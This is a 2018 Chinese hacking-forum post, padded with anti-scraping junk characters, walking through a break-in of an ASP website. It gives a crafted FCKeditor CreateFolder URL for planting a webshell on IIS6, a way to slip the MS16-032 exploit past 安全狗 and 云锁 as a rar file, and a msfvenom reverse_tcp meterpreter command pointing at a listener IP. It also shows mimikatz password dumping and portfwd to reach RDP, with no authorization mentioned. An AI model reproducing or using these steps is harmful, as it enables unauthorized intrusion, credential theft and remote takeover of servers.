找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2176|回复: 1
打印 上一主题 下一主题

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:31:43 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

) W6 J3 o, `+ y+ ?

2 b3 ~8 |# x; O! d0 y5 d% i; n9 E: K8 [0 g7 _! S' S0 u& Y. V9 r7 i, j1 Y7 U" |, Y3 P" a0 {8 A, i$ p7 A" J- c" o K/ E( [& O' b. c/ @8 g( a `8 P
( \& K. A W+ G# }6 `0 X! D3 [

. L6 ?- J3 }5 I8 J
, N Y- T* H# D$ F
一、 利用getwebshell
1 g* r0 h1 {# s9 e" A$ _
3 j d: K1 ^! H7 T1 a/ E
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
9 S+ c9 X; T9 J& @. @4 Z
8 C+ ~. Q8 ?4 A6 S/ F 222.png
2 D; S9 x# I7 D3 l- L2 U
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
' c. s# g/ L/ H! O5 ?3 R 333.png
. n8 u% D9 O& v2 C( p
下面我们构造一个asp目录,如: . w9 z( P. j5 h3 {1 K0 P

) q% A7 B1 P# K& E) O( m

. u: Y9 _5 y i: F% H4 s& r( K http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 0 o& d' ~. _, d" ?- p. H% U

: G0 n7 ?/ h( h9 o4 C2 ]

' \7 R9 D5 X" m9 B 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
# K) w' U7 T. ]( N9 y; r
4 _& Y3 u6 _! T) B2 {4 p
一、 绕过安全狗云锁提权并且加账号
) F: j+ N! {; I 444.png
# @. _/ r% m/ k. S& H
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
/ O$ o7 c* C e1 h( r* f
6 v ~2 V/ l' M, X
如图:
/ l9 n( a0 O+ F1 U* e+ q* X& K 555.png
9 r8 y% {; I7 K N, h% a' O
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
' M+ i/ d* w w; H3 k% D# t
* n* ^5 V! x( X# V
一、 利用metasploit
0 U! q! C7 }7 V# m/ Z
' U( Y# x& u7 G. f) m) j. t
首先用pentestbox生成一个64位的payload如下命令
2 G# \( U' q- ^& Q1 o/ U S
: L' n; O" j3 W( ^; D msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
) ]0 d# `: |: }4 }$ c- Y6 W
$ P6 i/ i. e$ r+ B
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
& z: U* m. Q0 r' r; u- f 11.png
# h+ }. N# m8 l3 w1 L0 o
下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
, h6 K" j" L2 e* K0 K8 |- C! G8 H13.png
+ N, \9 s. N1 m
下面我们来做一个监听如下命令:
- K) ~, h2 l3 X: R! E
9 q) T# k7 t8 {8 H" Z$ | portfwd add -l 6655 -p 3968 -r 127.0.0.1
,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
, J( P2 p3 X8 I- H# L' _ C0 G18.png
7 V4 A, a [3 \' E7 s4 ?9 }

9 Q" |0 S7 @- f5 L
2 F+ k& N+ U' ]1 G/ ^

b; Z7 y. \; M: z

$ D! t- }; z" Y! P
6 i$ @1 I G8 U, X1 N6 U+ ~
3 l1 n& ]: F$ f* b1 R0 G
8 f$ T$ j4 N9 z

2 |/ b( r5 d2 m+ o* H2 l
: `9 N4 u/ [3 X l d . Y' g; V; W9 Q$ Z* V

- r3 O5 H6 [1 T
8 a4 a4 p$ W+ G% T6 ^- G2 s; X

回复

使用道具 举报

沙发
匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表